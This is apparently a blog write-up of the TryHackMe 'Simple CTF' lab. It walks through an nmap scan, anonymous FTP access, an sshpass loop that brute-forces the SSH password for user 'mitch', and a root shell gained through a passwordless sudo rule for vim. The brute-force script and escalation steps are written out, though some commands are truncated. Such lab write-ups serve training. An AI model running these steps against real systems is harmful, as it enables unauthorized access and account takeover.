Simple CTF [EASY] Writeup  - Try Hack Me

Simple CTF [EASY] Writeup - Try Hack Me


3 min read

Files used in this blog are here

Port scan ๐Ÿ”

First we start by scanning the ports

nmap -p- -T4 --min-rate 5000 -vvv -o fullscan

-p1- means all ports -T4 is for an aggressive scan --min-rate 5000 is used to tell how many packages per second are we sending -vvv is verbose -o is for file output

# Nmap 7.80 scan initiated Fri Feb 16 00:10:54 2024 as: nmap -p- -T4 --min-rate 5000 -vvv -o fullscan
Nmap scan report for (
Host is up, received syn-ack (0.27s latency).
Scanned at 2024-02-16 00:10:54 -03 for 42s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
21/tcp   open  ftp          syn-ack
80/tcp   open  http         syn-ack
2222/tcp open  EtherNetIP-1 syn-ack

Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Feb 16 00:11:36 2024 -- 1 IP address (1 host up) scanned in 41.57 seconds

FTP Anonymous login ๐Ÿคฟ

Now since there is a port open at 21, we can try to do a anonymous login.

Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Now we are inside! We can verify by running a command like ls

ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.

If we see something like passive mode, just type passive and will enter active mode.

If we dig inside the folder pub there is a file called ForMitch.txt we are going to download that with get <file_name>

And in our local computer we do a cat <file_name>

We got the following response

Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

Brute force ๐Ÿ‘Š

So we know that their user is the same for the system and that contains a weak password

Since the message mentions a name we are going to asume that the user is mitch, now we should try to brute force the password.

I'm going to use a package called sshpass in order to send the password from a wordlist that I got from internet and create a simple script like this


for password in $(cat weak_passwords.txt); do
    echo "Trying password: $password"
    sshpass -p$password ssh -p 2222 -o StrictHostKeyChecking=no -o IdentitiesOnly=yes mitch@

After a long time trying I got the password!


Obtain the flags ๐Ÿ

If we do a ls we can see that the user.txt flag is there, take it and continue!

One of the first things you always do in a system (even before trying things like linpeas) is to do a simple sudo -l to see if there is something that can be run with sudo.

$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

And of course there he's, we can use sudo vim

Lets do a sudo vim then type : and after ! ls /root and press enter, with this we are going to see if the root flag is there.


$ sudo vim


And there it is! just like before but this time with ! cat /root/root.txt


Congratulations you got your flag!